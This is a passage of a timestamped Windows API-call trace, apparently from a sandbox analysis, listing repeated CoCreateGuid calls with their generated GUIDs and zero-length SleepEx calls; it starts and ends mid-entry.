[6]=0xed, [7]=0x62))) returned 0x0 [0183.828] CoCreateGuid (in: pguid=0x7daef10 | out: pguid=0x7daef10*(Data1=0xe2cb3217, Data2=0xee1f, Data3=0x4ec7, Data4=([0]=0x9f, [1]=0x0, [2]=0x18, [3]=0x9b, [4]=0x75, [5]=0x84, [6]=0x55, [7]=0x6f))) returned 0x0 [0183.828] CoCreateGuid (in: pguid=0x7daef10 | out: pguid=0x7daef10*(Data1=0x2494bff7, Data2=0xbaf5, Data3=0x4546, Data4=([0]=0x80, [1]=0xbf, [2]=0x60, [3]=0x10, [4]=0x69, [5]=0x69, [6]=0xb2, [7]=0x8b))) returned 0x0 [0185.072] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.104] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.150] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.213] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.380] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.416] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.463] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.601] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.697] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.741] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.788] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.835] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.882] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.929] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.976] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.030] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.069] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.165] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.210] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.420] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.587] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.720] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.851] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0186.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.085] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.491] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.569] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.616] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.835] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.913] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0187.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.086] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.165] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.242] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.429] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.522] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.616] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.694] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.851] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0188.929] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0189.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0194.915] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.040] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.727] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.308] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.521] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0197.111] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x1bed5d6e, Data2=0xd5e0, Data3=0x405b, Data4=([0]=0xb2, [1]=0x48, [2]=0x46, [3]=0xa5, [4]=0xef, [5]=0xba, [6]=0x6d, [7]=0xce))) returned 0x0 [0197.112] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xaeca3518, Data2=0x13e7, Data3=0x4a9c, Data4=([0]=0xa0, [1]=0xfc, [2]=0x81, [3]=0x9e, [4]=0x8f, [5]=0xfa, [6]=0xb, [7]=0x57))) returned 0x0 [0197.112] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x7c91cce6, Data2=0x9e6f, Data3=0x408c, Data4=([0]=0xad, [1]=0x7d, [2]=0x99, [3]=0xb4, [4]=0xa2, [5]=0xf6, [6]=0x93, [7]=0x7e))) returned 0x0 [0197.113] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xccbe9ec, Data2=0x734, Data3=0x4872, Data4=([0]=0xa7, [1]=0x57, [2]=0x6c, [3]=0x26, [4]=0xee, [5]=0x72, [6]=0xb2, [7]=0x79))) returned 0x0 [0197.113] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x76c5252a, Data2=0x2b22, Data3=0x4e29, Data4=([0]=0xbd, [1]=0x4d, [2]=0x8e, [3]=0xe3, [4]=0xbe, [5]=0xf2, [6]=0xa3, [7]=0x14))) returned 0x0 [0197.114] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x7c23b2e5, Data2=0x7ab, Data3=0x44cd, Data4=([0]=0xa7, [1]=0xe9, [2]=0x72, [3]=0xcc, [4]=0x18, [5]=0x2c, [6]=0xc1, [7]=0x24))) returned 0x0 [0197.114] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xdb7cc037, Data2=0x5667, Data3=0x4931, Data4=([0]=0xbe, [1]=0xc8, [2]=0xc0, [3]=0x8d, [4]=0x1c, [5]=0x70, [6]=0x91, [7]=0xe8))) returned 0x0 [0197.115] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xbddabb90, Data2=0x57f2, Data3=0x451c, Data4=([0]=0x96, [1]=0xe, [2]=0x45, [3]=0x2c, [4]=0x38, [5]=0x33, [6]=0xa1, [7]=0x42))) returned 0x0 [0197.116] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xee7e208c, Data2=0x9161, Data3=0x4a7e, Data4=([0]=0xbc, [1]=0x99, [2]=0x68, [3]=0x1b, [4]=0x22, [5]=0x8e, [6]=0xe2, [7]=0x67))) returned 0x0 [0197.116] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x3a4f2d5c, Data2=0xf38d, Data3=0x4d53, Data4=([0]=0xa9, [1]=0x3e, [2]=0xbc, [3]=0x36, [4]=0x79, [5]=0x54, [6]=0xee, [7]=0x3a))) returned 0x0 [0197.117] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x8c44ce65, Data2=0xc5de, Data3=0x4b88, Data4=([0]=0x88, [1]=0xce, [2]=0xc0, [3]=0xbe, [4]=0x65, [5]=0x99, [6]=0x69, [7]=0x8a))) returned 0x0 [0197.117] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf44a0a8c, Data2=0xaa56, Data3=0x4fa2, Data4=([0]=0x98, [1]=0xcf, [2]=0x8f, [3]=0x19, [4]=0x79, [5]=0x3b, [6]=0xcf, [7]=0xd9))) returned 0x0 [0197.118] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x1107b381, Data2=0xa731, Data3=0x4524, Data4=([0]=0x8e, [1]=0x46, [2]=0xcb, [3]=0x7e, [4]=0xe1, [5]=0xc7, [6]=0xa3, [7]=0x29))) returned 0x0 [0197.118] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x3680f724, Data2=0xd0d0, Data3=0x40bf, Data4=([0]=0xa7, [1]=0x32, [2]=0x3a, [3]=0x63, [4]=0xb1, [5]=0xf6, [6]=0xb2, [7]=0x8b))) returned 0x0 [0197.119] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xca221a09, Data2=0x568f, Data3=0x434c, Data4=([0]=0x88, [1]=0x9d, [2]=0xa0, [3]=0xde, [4]=0x1c, [5]=0x41, [6]=0x80, [7]=0x58))) returned 0x0 [0197.119] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x1288fc, Data2=0xcd2e, Data3=0x4d18, Data4=([0]=0x97, [1]=0x34, [2]=0x8c, [3]=0x8c, [4]=0x43, [5]=0x7, [6]=0xeb, [7]=0x6c))) returned 0x0 [0197.120] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa0d3c05d, Data2=0x87e0, Data3=0x4db2, Data4=([0]=0x94, [1]=0x61, [2]=0xfe, [3]=0xae, [4]=0x1, [5]=0x4, [6]=0x15, [7]=0x54))) returned 0x0 [0197.120] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x748bf62a, Data2=0x55f7, Data3=0x4ced, Data4=([0]=0xba, [1]=0xd4, [2]=0x35, [3]=0x7f, [4]=0xcb, [5]=0x67, [6]=0x5d, [7]=0x2))) returned 0x0 [0197.121] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xc349b111, Data2=0xbe1f, Data3=0x4049, Data4=([0]=0x88, [1]=0xe9, [2]=0x92, [3]=0xb3, [4]=0x6e, [5]=0x52, [6]=0x9f, [7]=0xc1))) returned 0x0 [0197.121] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xc53f6e51, Data2=0x9666, Data3=0x48b6, Data4=([0]=0xa0, [1]=0x43, [2]=0x22, [3]=0xa6, [4]=0x7e, [5]=0xb1, [6]=0xf8, [7]=0x98))) returned 0x0 [0197.122] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xacbe1720, Data2=0xc69e, Data3=0x443d, Data4=([0]=0x9f, [1]=0x69, [2]=0x4b, [3]=0x49, [4]=0xd9, [5]=0x11, [6]=0x60, [7]=0xee))) returned 0x0 [0197.122] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xcd67a8de, Data2=0x5fc7, Data3=0x4717, Data4=([0]=0xb7, [1]=0xf2, [2]=0x44, [3]=0xc1, [4]=0x9c, [5]=0x85, [6]=0x15, [7]=0xb8))) returned 0x0 [0197.122] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xef520b54, Data2=0x1a54, Data3=0x47c6, Data4=([0]=0xaf, [1]=0xba, [2]=0x76, [3]=0x54, [4]=0x50, [5]=0x18, [6]=0xa5, [7]=0x99))) returned 0x0 [0197.123] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x8e816d50, Data2=0x3e13, Data3=0x4ea6, Data4=([0]=0xbf, [1]=0xa4, [2]=0x87, [3]=0x9e, [4]=0xbd, [5]=0xd7, [6]=0xa7, [7]=0xb6))) returned 0x0 [0197.123] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x1614cc88, Data2=0x2943, Data3=0x4040, Data4=([0]=0xb6, [1]=0x1e, [2]=0x9c, [3]=0xdc, [4]=0x7c, [5]=0x9b, [6]=0xd6, [7]=0x5b))) returned 0x0 [0197.124] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x22a98dc3, Data2=0xeaf8, Data3=0x4051, Data4=([0]=0xb4, [1]=0xe5, [2]=0x93, [3]=0x3f, [4]=0xcd, [5]=0x28, [6]=0x9c, [7]=0xe2))) returned 0x0 [0197.124] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x3e54420c, Data2=0x60fb, Data3=0x472b, Data4=([0]=0xad, [1]=0xfc, [2]=0x20, [3]=0x34, [4]=0x4e, [5]=0x1d, [6]=0x72, [7]=0x1))) returned 0x0 [0197.124] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x84f16ca6, Data2=0x3fd0, Data3=0x4591, Data4=([0]=0x83, [1]=0xc7, [2]=0x51, [3]=0xd9, [4]=0xae, [5]=0x4, [6]=0x39, [7]=0x1d))) returned 0x0 [0197.125] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x6bd034b4, Data2=0x4c26, Data3=0x4a7e, Data4=([0]=0x93, [1]=0x98, [2]=0x5b, [3]=0xd2, [4]=0x1b, [5]=0x5a, [6]=0xa4, [7]=0x0))) returned 0x0 [0197.125] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x1f718d37, Data2=0xfc11, Data3=0x40e9, Data4=([0]=0xbe, [1]=0x6c, [2]=0xe3, [3]=0xb3, [4]=0x6b, [5]=0x8e, [6]=0xe0, [7]=0xa5))) returned 0x0 [0197.126] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x939d9df4, Data2=0x83e, Data3=0x4714, Data4=([0]=0x8e, [1]=0x84, [2]=0xd2, [3]=0xe4, [4]=0xcd, [5]=0x83, [6]=0x2a, [7]=0xf3))) returned 0x0 [0197.126] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x4defab65, Data2=0x27e8, Data3=0x424f, Data4=([0]=0x83, [1]=0x9c, [2]=0x65, [3]=0xbb, [4]=0xc, [5]=0xd, [6]=0xf6, [7]=0xc9))) returned 0x0 [0197.126] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x60bf1749, Data2=0xb3bd, Data3=0x4f5f, Data4=([0]=0xab, [1]=0x8e, [2]=0xf2, [3]=0x5f, [4]=0xf2, [5]=0x7c, [6]=0x54, [7]=0xbf))) returned 0x0 [0197.127] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x4b8bb917, Data2=0x64a9, Data3=0x4780, Data4=([0]=0x9f, [1]=0xde, [2]=0x99, [3]=0xc5, [4]=0x35, [5]=0x9a, [6]=0xcc, [7]=0xb6))) returned 0x0 [0197.128] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x3c7d4425, Data2=0x4bf7, Data3=0x4815, Data4=([0]=0xb8, [1]=0xc9, [2]=0xb0, [3]=0x90, [4]=0xfb, [5]=0xc9, [6]=0x4d, [7]=0x30))) returned 0x0 [0197.128] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd28bd652, Data2=0xfe32, Data3=0x44c3, Data4=([0]=0x8a, [1]=0xcb, [2]=0x11, [3]=0xf0, [4]=0x79, [5]=0xf1, [6]=0x0, [7]=0x55))) returned 0x0 [0197.129] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xbc252a21, Data2=0xa84b, Data3=0x4127, Data4=([0]=0xbe, [1]=0x6, [2]=0x70, [3]=0xe3, [4]=0x74, [5]=0x54, [6]=0xc3, [7]=0x7d))) returned 0x0 [0197.131] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x394cf987, Data2=0xc3b4, Data3=0x4755, Data4=([0]=0x99, [1]=0xf4, [2]=0xd8, [3]=0x9c, [4]=0x66, [5]=0x81, [6]=0x4, [7]=0xf5))) returned 0x0 [0197.131] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd9b3f3d7, Data2=0x5ef6, Data3=0x4291, Data4=([0]=0xb2, [1]=0xd4, [2]=0xb2, [3]=0x84, [4]=0x11, [5]=0x5, [6]=0xcc, [7]=0xe4))) returned 0x0 [0197.131] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf8777951, Data2=0x454b, Data3=0x472e, Data4=([0]=0xa9, [1]=0xfb, [2]=0xb0, [3]=0xc7, [4]=0xb1, [5]=0xa9, [6]=0xb3, [7]=0xd3))) returned 0x0 [0197.132] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x8edac943, Data2=0x873e, Data3=0x4b18, Data4=([0]=0x88, [1]=0xba, [2]=0xd9, [3]=0x6b, [4]=0xcb, [5]=0xc1, [6]=0x2c, [7]=0xc8))) returned 0x0 [0197.132] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf21f874, Data2=0xafd8, Data3=0x4685, Data4=([0]=0x94, [1]=0x82, [2]=0xa7, [3]=0xee, [4]=0x74, [5]=0x6a, [6]=0x2, [7]=0xe6))) returned 0x0 [0197.133] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd1a160eb, Data2=0x4410, Data3=0x48ea, Data4=([0]=0xac, [1]=0x2f, [2]=0xfe, [3]=0x9c, [4]=0x7c, [5]=0x74, [6]=0x3b, [7]=0x8f))) returned 0x0 [0197.133] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x91cc94d9, Data2=0x95fd, Data3=0x4da3, Data4=([0]=0x9d, [1]=0xc8, [2]=0x8d, [3]=0x1f, [4]=0x23, [5]=0x7f, [6]=0x3d, [7]=0x23))) returned 0x0 [0197.134] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x4fbbb2c7, Data2=0x756c, Data3=0x426e, Data4=([0]=0x9d, [1]=0xd4, [2]=0xe, [3]=0xda, [4]=0xf4, [5]=0x85, [6]=0x53, [7]=0xe))) returned 0x0 [0197.135] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x63edab0c, Data2=0x19d1, Data3=0x4f53, Data4=([0]=0x93, [1]=0xe0, [2]=0xf4, [3]=0x16, [4]=0xc, [5]=0xa4, [6]=0x10, [7]=0xac))) returned 0x0 [0197.135] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x823c1bbc, Data2=0x9eef, Data3=0x4f29, Data4=([0]=0xb1, [1]=0x98, [2]=0xfd, [3]=0xb9, [4]=0x56, [5]=0xd3, [6]=0x5f, [7]=0xda))) returned 0x0 [0197.185] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xb0ed248d, Data2=0x419c, Data3=0x4c2b, Data4=([0]=0xa8, [1]=0x2e, [2]=0xd4, [3]=0x76, [4]=0xcd, [5]=0xe2, [6]=0xfa, [7]=0xdb))) returned 0x0 [0197.186] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x19e0d040, Data2=0xd7e1, Data3=0x4988, Data4=([0]=0x90, [1]=0xbe, [2]=0x11, [3]=0x62, [4]=0x21, [5]=0xbf, [6]=0xff, [7]=0x5))) returned 0x0 [0197.186] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xe91f1f1a, Data2=0x85f3, Data3=0x4d54, Data4=([0]=0x8c, [1]=0x9f, [2]=0x9d, [3]=0x69, [4]=0x19, [5]=0x96, [6]=0x36, [7]=0x51))) returned 0x0 [0197.186] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x3f63da87, Data2=0xd86f, Data3=0x4e5e, Data4=([0]=0xbf, [1]=0xce, [2]=0x7d, [3]=0x11, [4]=0x8, [5]=0x93, [6]=0x61, [7]=0x7))) returned 0x0 [0197.187] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xfa374604, Data2=0x4f95, Data3=0x46e1, Data4=([0]=0x82, [1]=0xe7, [2]=0xc7, [3]=0x8f, [4]=0xd4, [5]=0xe1, [6]=0x7, [7]=0xdf))) returned 0x0 [0197.670] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa3234e00, Data2=0x503d, Data3=0x490d, Data4=([0]=0xb9, [1]=0x37, [2]=0xcd, [3]=0x99, [4]=0x8e, [5]=0xdf, [6]=0x84, [7]=0x9c))) returned 0x0 [0197.674] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf364ebf, Data2=0xe633, Data3=0x47e0, Data4=([0]=0xbb, [1]=0x3a, [2]=0xdf, [3]=0x9d, [4]=0x27, [5]=0xb9, [6]=0x99, [7]=0x49))) returned 0x0 [0197.675] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x6ecc3e0f, Data2=0x84d6, Data3=0x45e2, Data4=([0]=0x88, [1]=0xe, [2]=0xf5, [3]=0x65, [4]=0x22, [5]=0xf9, [6]=0x39, [7]=0x1d))) returned 0x0 [0197.675] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xcf1f6cbf, Data2=0xf7fd, Data3=0x4da1, Data4=([0]=0xa1, [1]=0xde, [2]=0x9, [3]=0x29, [4]=0x87, [5]=0x7c, [6]=0x12, [7]=0x47))) returned 0x0 [0197.676] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x35cdd0e5, Data2=0x4685, Data3=0x4aab, Data4=([0]=0xa0, [1]=0x29, [2]=0x1, [3]=0xd3, [4]=0xdc, [5]=0xac, [6]=0x7, [7]=0x6d))) returned 0x0 [0197.677] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x2b91f144, Data2=0xbc81, Data3=0x41b6, Data4=([0]=0xac, [1]=0xd7, [2]=0x6d, [3]=0x29, [4]=0xcf, [5]=0x9f, [6]=0x85, [7]=0x78))) returned 0x0 [0197.677] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x2ba39cbf, Data2=0xcaae, Data3=0x42a1, Data4=([0]=0xab, [1]=0xe2, [2]=0xce, [3]=0x57, [4]=0xfd, [5]=0x26, [6]=0x24, [7]=0x1b))) returned 0x0 [0197.678] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf162314b, Data2=0x3447, Data3=0x4ecf, Data4=([0]=0x84, [1]=0x9a, [2]=0x81, [3]=0x7f, [4]=0x22, [5]=0x95, [6]=0x4, [7]=0xa6))) returned 0x0 [0197.678] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xcc4e04e3, Data2=0xb5b3, Data3=0x4c06, Data4=([0]=0xba, [1]=0xf5, [2]=0xe0, [3]=0x1, [4]=0x8e, [5]=0x18, [6]=0x8b, [7]=0xaa))) returned 0x0 [0197.679] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x31fd6964, Data2=0x7a66, Data3=0x4fdf, Data4=([0]=0xb4, [1]=0x14, [2]=0xed, [3]=0x9c, [4]=0x73, [5]=0x75, [6]=0x4e, [7]=0x6f))) returned 0x0 [0197.679] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x764781a4, Data2=0xbd4d, Data3=0x4385, Data4=([0]=0xbb, [1]=0xa8, [2]=0xa5, [3]=0x26, [4]=0x4f, [5]=0x1, [6]=0x58, [7]=0xd4))) returned 0x0 [0197.680] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x191f7157, Data2=0x766d, Data3=0x42cf, Data4=([0]=0x87, [1]=0x7b, [2]=0xbe, [3]=0x8d, [4]=0x27, [5]=0x4f, [6]=0xa2, [7]=0x23))) returned 0x0 [0197.680] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x76ac055c, Data2=0xfd88, Data3=0x4da8, Data4=([0]=0x91, [1]=0x78, [2]=0xc3, [3]=0x2a, [4]=0x70, [5]=0x21, [6]=0xd5, [7]=0x7b))) returned 0x0 [0197.681] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x10c4f2f, Data2=0x73e9, Data3=0x42e1, Data4=([0]=0x91, [1]=0x4a, [2]=0x5d, [3]=0x9a, [4]=0x92, [5]=0x34, [6]=0x6f, [7]=0xc2))) returned 0x0 [0197.682] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd0f2cfcb, Data2=0x34c0, Data3=0x416d, Data4=([0]=0xa8, [1]=0x27, [2]=0x85, [3]=0x67, [4]=0x8f, [5]=0x11, [6]=0x8c, [7]=0xe3))) returned 0x0 [0197.682] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xcdc26a5, Data2=0x279a, Data3=0x4ed3, Data4=([0]=0xa9, [1]=0x37, [2]=0xd4, [3]=0xdf, [4]=0x8e, [5]=0x18, [6]=0x7f, [7]=0xa5))) returned 0x0 [0197.688] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x10d9fb5c, Data2=0x5927, Data3=0x4fea, Data4=([0]=0xa4, [1]=0x11, [2]=0xba, [3]=0x4d, [4]=0x92, [5]=0x1e, [6]=0xfd, [7]=0x55))) returned 0x0 [0197.689] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x53f0a61d, Data2=0xb51c, Data3=0x4b43, Data4=([0]=0xbc, [1]=0x44, [2]=0xcb, [3]=0xc9, [4]=0x6e, [5]=0x9, [6]=0xaf, [7]=0x98))) returned 0x0 [0197.689] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x70407eb8, Data2=0xad51, Data3=0x46e9, Data4=([0]=0xbb, [1]=0xd9, [2]=0x54, [3]=0xc5, [4]=0x9c, [5]=0x8a, [6]=0x52, [7]=0xd5))) returned 0x0 [0197.690] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x66bab76, Data2=0x85fc, Data3=0x4db5, Data4=([0]=0xba, [1]=0xf6, [2]=0x10, [3]=0xb2, [4]=0x88, [5]=0xaf, [6]=0x52, [7]=0xf6))) returned 0x0 [0197.691] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x24f404ce, Data2=0x4846, Data3=0x44c2, Data4=([0]=0x88, [1]=0x6e, [2]=0x80, [3]=0xdc, [4]=0xe9, [5]=0x9, [6]=0x42, [7]=0x58))) returned 0x0 [0197.691] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa8bf3b6c, Data2=0xdf6f, Data3=0x4b77, Data4=([0]=0x95, [1]=0xaf, [2]=0x3c, [3]=0x31, [4]=0x3, [5]=0x79, [6]=0xcc, [7]=0xc6))) returned 0x0 [0197.692] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x2168f5fd, Data2=0x87b8, Data3=0x49a6, Data4=([0]=0xb3, [1]=0x55, [2]=0xf8, [3]=0xb9, [4]=0x83, [5]=0x77, [6]=0x21, [7]=0x6f))) returned 0x0 [0197.693] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x283530d, Data2=0xdd93, Data3=0x40a1, Data4=([0]=0x86, [1]=0x4, [2]=0x6c, [3]=0x2e, [4]=0x70, [5]=0xfd, [6]=0x3, [7]=0x8b))) returned 0x0 [0197.694] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x85f6a7a4, Data2=0x25e3, Data3=0x4f64, Data4=([0]=0xbb, [1]=0xa3, [2]=0xe, [3]=0x98, [4]=0x69, [5]=0x16, [6]=0x24, [7]=0xaa))) returned 0x0 [0197.694] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x2d353b6, Data2=0x58fe, Data3=0x4a95, 